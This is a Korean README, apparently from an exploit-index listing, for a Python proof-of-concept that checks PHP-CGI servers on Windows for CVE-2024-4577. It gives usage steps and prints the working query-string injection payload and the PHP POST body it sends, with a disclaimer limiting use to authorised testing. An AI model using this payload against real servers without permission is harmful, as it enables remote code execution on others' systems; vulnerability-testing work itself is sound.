Share 
## https://sploitus.com/exploit?id=49191F8E-6A33-5811-9B03-BB811AEEEEAC
# CVE-2024-4577 취약점 ν…ŒμŠ€νŠΈ 슀크립트

이 Python μŠ€ν¬λ¦½νŠΈλŠ” PHP의 μ΅œμ‹  취약점인 [`CVE-2024-4577`](https://nvd.nist.gov/vuln/detail/CVE-2024-4577)을 μ§„λ‹¨ν•˜κΈ° μœ„ν•œ κ°„λ‹¨ν•œ PoC(Proof of Concept) λ„κ΅¬μž…λ‹ˆλ‹€.

> ⚠️ λ³Έ λ„κ΅¬λŠ” **λ³΄μ•ˆ 진단 λͺ©μ **으둜 제곡되며, **본인 μ†Œμœ μ˜ μ‹œμŠ€ν…œ** λ˜λŠ” **사전 ν—ˆκ°€λ₯Ό 받은 λŒ€μƒμ—λ§Œ μ‚¬μš©**ν•΄μ•Ό ν•©λ‹ˆλ‹€.

---

## πŸ“Œ κ°œμš”

이 취약점은 PHPκ°€ Windows ν™˜κ²½μ—μ„œ CGI λͺ¨λ“œλ‘œ λ™μž‘ν•  λ•Œ, **λ©€ν‹°λ°”μ΄νŠΈ 문자 우회λ₯Ό 톡해** μž„μ˜μ˜ PHP 섀정을 μ£Όμž…ν•˜κ³  μ½”λ“œ 싀행을 μœ λ„ν•  수 μžˆλŠ” λ¬Έμ œμž…λ‹ˆλ‹€.

이 μŠ€ν¬λ¦½νŠΈλŠ” λŒ€μƒ URL에 λŒ€ν•΄ 쿼리슀트링 기반 우회 νŽ˜μ΄λ‘œλ“œμ™€ PHP μ½”λ“œλ₯Ό POST μš”μ²­μœΌλ‘œ μ „μ†‘ν•˜μ—¬ μ·¨μ•½ μ—¬λΆ€λ₯Ό νŒλ‹¨ν•©λ‹ˆλ‹€.

---

## βœ… μ‚¬μš© 방법

### 1. Python μ„€μΉ˜ 확인

```bash
python3 --version
```

### 2. 의쑴 νŒ¨ν‚€μ§€ μ„€μΉ˜

```bash
pip install requests
```

### 3. 슀크립트 μ‹€ν–‰

```bash
python3 cve_2024_4577_test.py
```

### 4. λŒ€μƒ URL μž…λ ₯

μ˜ˆμ‹œ μž…λ ₯:

```
http://192.168.0.10/index.php
```

λ˜λŠ” 루트 경둜만 μž…λ ₯해도 μžλ™ μ²˜λ¦¬λ©λ‹ˆλ‹€

```
http://192.168.0.10
```

---

## πŸ” κ²°κ³Ό μ„€λͺ…

- βœ… `[βœ…] μ·¨μ•½: μ„œλ²„κ°€ PHP μ½”λ“œλ₯Ό μ‹€ν–‰ν–ˆμŠ΅λ‹ˆλ‹€.`  
  β†’ ν•΄λ‹Ή μ„œλ²„λŠ” μ·¨μ•½ν•©λ‹ˆλ‹€.

- βœ”οΈ `[βœ”οΈ] λΉ„μ·¨μ•½ λ˜λŠ” 차단됨`  
  β†’ 응닡은 λ°›μ•˜μ§€λ§Œ 취약점은 λ°œμƒν•˜μ§€ μ•ŠμŒ.

- ❌ `[❌] μš”μ²­ μ‹€νŒ¨: ...`  
  β†’ μ—°κ²° 였λ₯˜, νƒ€μž„μ•„μ›ƒ λ“±μœΌλ‘œ ν…ŒμŠ€νŠΈ μ‹€νŒ¨.

---

## πŸ’‘ λ™μž‘ 원리

- 취약점 우회 λ¬Έμžμ—΄ μ‚½μž…:  
  ```
  ?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
  ```

- POST 본문에 PHP μ½”λ“œ μ‚½μž…:
  ```php
  <?php echo 'CVE-2024-4577-TEST'; ?>
  ```

- μ„œλ²„κ°€ 이 μ½”λ“œλ₯Ό μ‹€ν–‰ν•˜λ©΄ 응닡에 ν•΄λ‹Ή λ¬Έμžμ—΄μ΄ ν¬ν•¨λ˜μ–΄ νŒλ‹¨ κ°€λŠ₯.

---

## ⚠️ λ©΄μ±… μ‘°ν•­

이 μŠ€ν¬λ¦½νŠΈλŠ” **ꡐ윑 및 λ³΄μ•ˆ 연ꡬ λͺ©μ **으둜만 제곡되며, ν—ˆκ°€λ°›μ§€ μ•Šμ€ μ‹œμŠ€ν…œμ„ μŠ€μΊ”ν•˜κ±°λ‚˜ ν…ŒμŠ€νŠΈν•˜λŠ” 것은 **λΆˆλ²•**μž…λ‹ˆλ‹€. μ‚¬μš©μžλŠ” λͺ¨λ“  μ±…μž„μ„ 슀슀둜 λΆ€λ‹΄ν•©λ‹ˆλ‹€.

---

## πŸ“‚ 파일 ꡬ성

| 파일λͺ…                  | μ„€λͺ…                              |
|-----------------------|-----------------------------------|
| `cve_2024_4577_test.py` | 취약점 ν…ŒμŠ€νŠΈμš© Python 슀크립트     |
| `README.md`           | μ‚¬μš©λ²• 및 μ„€λͺ… λ¬Έμ„œ (λ³Έ 파일)         |
| `LICENSE.txt`           |        |
---

## πŸ“« 문의

버그 μ‹ κ³ λ‚˜ μ œμ•ˆμ‚¬ν•­μ€ email λ˜λŠ” PR둜 λ‚¨κ²¨μ£Όμ„Έμš”.

## πŸ“ License
This project is licensed under the MIT License - see the [LICENSE](./LICENSE) file for details.
Copyright (c) 2025 KimJuhyeong95